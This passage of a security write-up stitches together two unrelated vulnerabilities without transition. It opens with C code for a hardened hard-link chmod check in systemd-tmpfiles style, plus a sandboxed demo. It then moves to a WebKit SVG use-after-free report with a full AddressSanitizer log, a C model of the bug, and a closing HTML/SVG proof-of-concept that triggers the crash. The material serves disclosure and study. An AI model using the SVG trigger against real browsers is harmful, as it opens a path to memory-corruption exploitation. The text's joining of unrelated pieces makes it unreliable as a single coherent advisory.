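 * included before _GNU_SOURCE took effect. */
#ifndef O_PATH
#define O_PATH 010000000
#endif
#ifndef AT_EMPTY_PATH
#define AT_EMPTY_PATH 0x1000
#endif

/* Hypothetical helper modelled on the advisory's hardlink_vulnerable():
 * a non-directory with more than one name is a hard link. */
static int hardlink_vulnerable(const struct stat *st) {
    return !S_ISDIR(st->st_mode) && st->st_nlink > 1;
}

/* Version-237 style: open first, stat the descriptor rather than the path,
 * refuse hard links, then chmod via /proc/self/fd so the inode that was
 * checked is the inode that is modified. Returns 0, -EPERM, or -errno. */
int chmod_refusing_hardlinks(const char *path, mode_t mode) {
    struct stat st;
    char procfd[64];
    int r = 0, fd = open(path, O_NOFOLLOW | O_CLOEXEC | O_PATH);
    if (fd < 0)
        return -errno;
    if (fstatat(fd, "", &st, AT_EMPTY_PATH) < 0)
        r = -errno;
    else if (hardlink_vulnerable(&st))
        r = -EPERM;   /* "Refusing to set permissions on hardlink" */
    else {
        snprintf(procfd, sizeof procfd, "/proc/self/fd/%d", fd);
        if (chmod(procfd, mode) < 0)
            r = -errno;
    }
    close(fd);
    return r;
}

/* Constructed scenario in a private temp dir: "secret" stands in for
 * /etc/passwd, "link" for the hard link dropped into the Z-managed tree.
 * Returns 0 when a path-based chmod (pre-237 behaviour) leaks 0755 onto
 * "secret" while the checked version refuses the link; else the failing step. */
int run_demo(void) {
    char dir[] = "/tmp/tmpfiles-demo-XXXXXX", secret[64], lnk[64];
    struct stat st;
    int step = 0, fd;
    if (!mkdtemp(dir))
        return 1;
    snprintf(secret, sizeof secret, "%s/secret", dir);
    snprintf(lnk, sizeof lnk, "%s/link", dir);
    fd = open(secret, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0 || close(fd) < 0 || link(secret, lnk) < 0)
        step = 2;
    else if (chmod(lnk, 0755) < 0)
        step = 3;
    else if (stat(secret, &st) < 0 || (st.st_mode & 0777) != 0755)
        step = 4;   /* naive chmod changed the original through the link */
    else if (chmod_refusing_hardlinks(lnk, 0600) != -EPERM)
        step = 5;   /* hardened version must refuse the hard link */
    else if (unlink(lnk) < 0 || chmod_refusing_hardlinks(secret, 0600) != 0)
        step = 6;   /* st_nlink is back to 1, so it proceeds */
    else if (stat(secret, &st) < 0 || (st.st_mode & 0777) != 0600)
        step = 7;
    unlink(lnk); unlink(secret); rmdir(dir);
    return step;
}
```

Note that the check is only as good as the window between open() and fstatat() described above; it narrows the race, it does not remove it.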
== Mitigation ==
Leave the fs.protected_hardlinks sysctl enabled.
<!--
There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on an ASan build of Revision 225572 on OSX.
The PoC is attached.
Preliminary Analysis:
SVGPropertyTearOff keeps a pointer to a SVG property in m_value. When detachWrapper() is called, that pointer gets dereferenced and the value copied. This comment explains when/why this is used:
https://github.com/WebKit/webkit/blob/5277f6fb92b0c03958265d24a7692142f7bdeaf8/Source/WebCore/svg/properties/SVGPropertyTearOff.h#L105
SVGPropertyTearOff keeps track of just a single value. In case the SVG property is actually a list of values, the values are stored in a Vector and SVGPropertyTearOff will keep a pointer to somewhere inside the vector's buffer. If a vector gets resized before detachWrapper() is called and the vector's buffer gets realloc()'ed, SVGPropertyTearOff's m_value will point to freed memory.
ASan log:
=================================================================
==50494==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c0000dccc0 at pc 0x0001262c1ba0 bp 0x7ffeee3a0460 sp 0x7ffeee3a0458
READ of size 8 at 0x60c0000dccc0 thread T0
==50494==WARNING: invalid path to external symbolizer!
==50494==WARNING: Failed to use and restart external symbolizer!
#0 0x1262c1b9f in WebCore::SVGPropertyTearOff<WebCore::SVGLengthValue>::detachWrapper() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xfe2b9f)
#1 0x1263e58ba in WebCore::SVGListProperty<WebCore::SVGLengthListValues>::detachListWrappersAndResize(WTF::Vector<WebCore::SVGLength*, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc>*, unsigned int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x11068ba)
#2 0x12899fc77 in void WebCore::SVGAnimatedTypeAnimator::executeAction<WebCore::SVGAnimatedListPropertyTearOff<WebCore::SVGLengthListValues> >(WebCore::SVGAnimatedTypeAnimator::AnimationAction, WTF::Vector<WebCore::SVGElementAnimatedProperties, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc> const&, unsigned int, WebCore::SVGAnimatedListPropertyTearOff<WebCore::SVGLengthListValues>::ContentType*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36c0c77)
#3 0x128985a0e in WebCore::SVGAnimateElementBase::resetAnimatedType() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36a6a0e)
#4 0x128afacc2 in WebCore::SVGSMILElement::progress(WebCore::SMILTime, WebCore::SVGSMILElement*, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x381bcc2)
#5 0x128af82c1 in WebCore::SMILTimeContainer::updateAnimations(WebCore::SMILTime, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x38192c1)
#6 0x128af6b5c in WebCore::SMILTimeContainer::timerFired() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3817b5c)
#7 0x127f21112 in WebCore::ThreadTimers::sharedTimerFiredInternal() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2c42112)
#8 0x127fc6009 in WebCore::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ce7009)
#9 0x7fff3e602bb3 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8ebb3)
#10 0x7fff3e602826 in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8e826)
#11 0x7fff3e602329 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8e329)
#12 0x7fff3e5f992a in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8592a)
#13 0x7fff3e5f8d22 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x84d22)
#14 0x7fff3d910e25 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fe25)
#15 0x7fff3d910b95 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fb95)
#16 0x7fff3d910913 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2f913)
#17 0x7fff3bbdbf5e in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x41f5e)
#18 0x7fff3c371b4b in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7d7b4b)
#19 0x7fff3bbd0d6c in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x36d6c)
#20 0x7fff3bb9ff19 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5f19)
#21 0x7fff6611a42e in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x1042e)
#22 0x7fff66119081 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf081)
#23 0x10185d4d6 in main (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x1000014d6)
#24 0x7fff65e4d114 in start (/usr/lib/system/libdyld.dylib:x86_64+0x1114)
0x60c0000dccc0 is located 0 bytes inside of 128-byte region [0x60c0000dccc0,0x60c0000dcd40)
freed by thread T0 here:
#0 0x1239d4fa4 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59fa4)
#1 0x1358554b0 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1fcb4b0)
#2 0x1263e6350 in WTF::Vector<WebCore::SVGLengthValue, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc>::shrinkCapacity(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1107350)
#3 0x126972f81 in WTF::Vector<WebCore::SVGLengthValue, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc>::operator=(WTF::Vector<WebCore::SVGLengthValue, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc> const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1693f81)
#4 0x1289a03cd in WebCore::SVGLengthListValues::operator=(WebCore::SVGLengthListValues const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36c13cd)
#5 0x12899806d in void WebCore::SVGAnimatedTypeAnimator::resetFromBaseValue<WebCore::SVGAnimatedListPropertyTearOff<WebCore::SVGLengthListValues> >(WTF::Vector<WebCore::SVGElementAnimatedProperties, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc> const&, WebCore::SVGAnimatedType&, WebCore::SVGAnimatedListPropertyTearOff<WebCore::SVGLengthListValues>::ContentType& (WebCore::SVGAnimatedType::*)()) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36b906d)
#6 0x1289859d8 in WebCore::SVGAnimateElementBase::resetAnimatedType() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36a69d8)
#7 0x128afacc2 in WebCore::SVGSMILElement::progress(WebCore::SMILTime, WebCore::SVGSMILElement*, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x381bcc2)
#8 0x128af82c1 in WebCore::SMILTimeContainer::updateAnimations(WebCore::SMILTime, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x38192c1)
#9 0x128af6b5c in WebCore::SMILTimeContainer::timerFired() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3817b5c)
#10 0x127f21112 in WebCore::ThreadTimers::sharedTimerFiredInternal() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2c42112)
#11 0x127fc6009 in WebCore::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ce7009)
#12 0x7fff3e602bb3 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8ebb3)
#13 0x7fff3e602826 in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8e826)
#14 0x7fff3e602329 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8e329)
#15 0x7fff3e5f992a in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8592a)
#16 0x7fff3e5f8d22 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x84d22)
#17 0x7fff3d910e25 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fe25)
#18 0x7fff3d910b95 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fb95)
#19 0x7fff3d910913 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2f913)
#20 0x7fff3bbdbf5e in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x41f5e)
#21 0x7fff3c371b4b in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7d7b4b)
#22 0x7fff3bbd0d6c in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x36d6c)
#23 0x7fff3bb9ff19 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5f19)
#24 0x7fff6611a42e in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x1042e)
#25 0x7fff66119081 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf081)
#26 0x10185d4d6 in main (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x1000014d6)
#27 0x7fff65e4d114 in start (/usr/lib/system/libdyld.dylib:x86_64+0x1114)
previously allocated by thread T0 here:
#0 0x1239d4a3c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59a3c)
#1 0x7fff65ff5200 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2200)
#2 0x135855944 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1fcb944)
#3 0x135853bdd in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1fc9bdd)
#4 0x1357c045b in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1f3645b)
#5 0x1357bf90a in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1f3590a)
#6 0x1252e5ed8 in WTF::FastMalloc::malloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x6ed8)
#7 0x1263e65f0 in WTF::VectorBufferBase<WebCore::SVGLengthValue, WTF::FastMalloc>::allocateBuffer(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x11075f0)
#8 0x126973640 in WTF::Vector<WebCore::SVGLengthValue, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc>::Vector(WTF::Vector<WebCore::SVGLengthValue, 0ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc> const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1694640)
#9 0x128998d47 in bool WebCore::SVGAnimationElement::adjustFromToListValues<WebCore::SVGLengthListValues>(WebCore::SVGLengthListValues const&, WebCore::SVGLengthListValues const&, WebCore::SVGLengthListValues&, float, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36b9d47)
#10 0x1289985bf in WebCore::SVGAnimatedLengthListAnimator::calculateAnimatedValue(float, unsigned int, WebCore::SVGAnimatedType*, WebCore::SVGAnimatedType*, WebCore::SVGAnimatedType*, WebCore::SVGAnimatedType*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36b95bf)
#11 0x128984d78 in WebCore::SVGAnimateElementBase::calculateAnimatedValue(float, unsigned int, WebCore::SVGSMILElement*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36a5d78)
#12 0x1289ae9cb in WebCore::SVGAnimationElement::updateAnimation(float, unsigned int, WebCore::SVGSMILElement*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x36cf9cb)
#13 0x128afad65 in WebCore::SVGSMILElement::progress(WebCore::SMILTime, WebCore::SVGSMILElement*, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x381bd65)
#14 0x128af82c1 in WebCore::SMILTimeContainer::updateAnimations(WebCore::SMILTime, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x38192c1)
#15 0x128af6b5c in WebCore::SMILTimeContainer::timerFired() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3817b5c)
#16 0x127f21112 in WebCore::ThreadTimers::sharedTimerFiredInternal() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2c42112)
#17 0x127fc6009 in WebCore::timerFired(__CFRunLoopTimer*, void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2ce7009)
#18 0x7fff3e602bb3 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_TIMER_CALLBACK_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8ebb3)
#19 0x7fff3e602826 in __CFRunLoopDoTimer (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8e826)
#20 0x7fff3e602329 in __CFRunLoopDoTimers (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8e329)
#21 0x7fff3e5f992a in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8592a)
#22 0x7fff3e5f8d22 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x84d22)
#23 0x7fff3d910e25 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fe25)
#24 0x7fff3d910b95 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2fb95)
#25 0x7fff3d910913 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2f913)
#26 0x7fff3bbdbf5e in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x41f5e)
#27 0x7fff3c371b4b in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7d7b4b)
#28 0x7fff3bbd0d6c in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x36d6c)
#29 0x7fff3bb9ff19 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x5f19)
SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xfe2b9f) in WebCore::SVGPropertyTearOff<WebCore::SVGLengthValue>::detachWrapper()
==50494==ABORTING
-->
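The ordering problem in the preliminary analysis above, as an added illustration in C (a constructed model, not WebKit code): a list whose resize replaces its buffer, a tear-off that caches a raw pointer into that buffer, and detach run both after and before the resize. The base-address comparison in tearoff_detach is a demo-only guard that reports the dangling pointer instead of reading it; it is not WebKit's fix.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Constructed model of the pattern described above (not WebKit code): a
 * growable list whose resize allocates a new buffer and frees the old one,
 * and a tear-off that caches a raw pointer into that buffer. */
typedef struct { double *items; size_t size, capacity; } LengthList;
typedef struct {
    double *m_value;   /* points into the owner's buffer until detached */
    uintptr_t base;    /* owner's buffer address when the pointer was taken */
    double copy;       /* the wrapper's own value after detach */
} TearOff;
/* Buffer reallocation as in Vector: new buffer, copy, free the old one. */
int list_reserve(LengthList *l, size_t cap) {
    if (cap <= l->capacity) return 0;
    double *p = malloc(cap * sizeof *p);
    if (!p) return -1;
    if (l->size) memcpy(p, l->items, l->size * sizeof *p);
    free(l->items);   /* every pointer into the old buffer now dangles */
    l->items = p;
    l->capacity = cap;
    return 0;
}

int list_push(LengthList *l, double v) {
    if (l->size == l->capacity && list_reserve(l, l->capacity ? 2 * l->capacity : 1) < 0)
        return -1;
    l->items[l->size++] = v;
    return 0;
}

TearOff tearoff_for(const LengthList *l, size_t i) {
    TearOff t = { &l->items[i], (uintptr_t)l->items, 0.0 };
    return t;
}

/* detachWrapper() analogue: copy the value out so the wrapper owns it. The
 * base-address guard (demo only) refuses the read once the buffer has moved. */
int tearoff_detach(TearOff *t, const LengthList *owner) {
    if (t->m_value == &t->copy) return 0;              /* already detached */
    if ((uintptr_t)owner->items != t->base) return -1; /* points at freed memory */
    t->copy = *t->m_value;
    t->m_value = &t->copy;
    return 0;
}

/* Bug ordering: the list is resized (pushing past capacity) before detach. */
int run_resize_then_detach(void) {
    LengthList l = { 0, 0, 0 };
    TearOff t;
    int r;
    list_push(&l, 1.5);
    t = tearoff_for(&l, 0);
    list_push(&l, 2.5);           /* capacity 1 -> 2: new buffer, old one freed */
    r = tearoff_detach(&t, &l);   /* -1: the read would be a use-after-free */
    free(l.items);
    return r;
}

/* Fixed ordering: every wrapper is detached first, then the list resized. */
int run_detach_then_resize(void) {
    LengthList l = { 0, 0, 0 };
    TearOff t;
    int r;
    list_push(&l, 1.5);
    t = tearoff_for(&l, 0);
    r = tearoff_detach(&t, &l);   /* 0: copied while the buffer is still live */
    list_push(&l, 2.5);
    free(l.items);
    return (r == 0 && *t.m_value == 1.5) ? 0 : -1;
}
```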
<script>
function eventhandler1() {
var x = svgvar00003.x.animVal.getItem(0);
svgvar00020.beginElement();
}
</script>
<svg>
<text x="1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1" id="svgvar00003">
<set id="svgvar00020" attributeName="x" to="100" onbegin="eventhandler1()" />